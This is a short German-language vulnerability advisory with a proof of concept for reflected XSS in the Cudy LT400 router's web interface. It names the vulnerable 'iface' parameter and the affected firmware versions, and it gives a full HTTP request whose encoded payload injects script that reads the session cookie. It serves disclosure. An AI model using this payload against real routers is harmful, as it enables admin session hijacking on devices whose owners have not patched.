
Proof-of-Concept für reflektiertes XSS in der Cudy-LT400-Weboberfläche, das den Diebstahl von Sitzungscookies und die Übernahme der Admin-Sitzung über manipulierte Anfragen demonstriert.
Reflektierte Cross-Site-Scripting (XSS)-Attacke existiert in der webbasierten Verwaltungsoberfläche des Cudy LT400.
Die Seite /cgi-bin/luci/admin/network/wireless/status ist anfällig für reflektiertes XSS über den Parameter iface.
Die Ausnutzungsmethoden beinhalten das Senden einer speziell manipulierten Anfrage an das Opfer, die schädlichen Code enthält.
Die betroffene Anwendung setzt das Session-Cookie nicht mit dem HttpOnly-Attribut; dies kann zur Übernahme des Administratorkontos durch Diebstahl des Session-Tokens führen.
Verwundbare Firmware-Versionen: 1.13.4 - 1.15.18 - 1.15.27
GET /cgi-bin/luci/admin/network/wireless/status?iface=wlan00%22%29%27%20href%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3Exss%3C%2Fa%3E HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology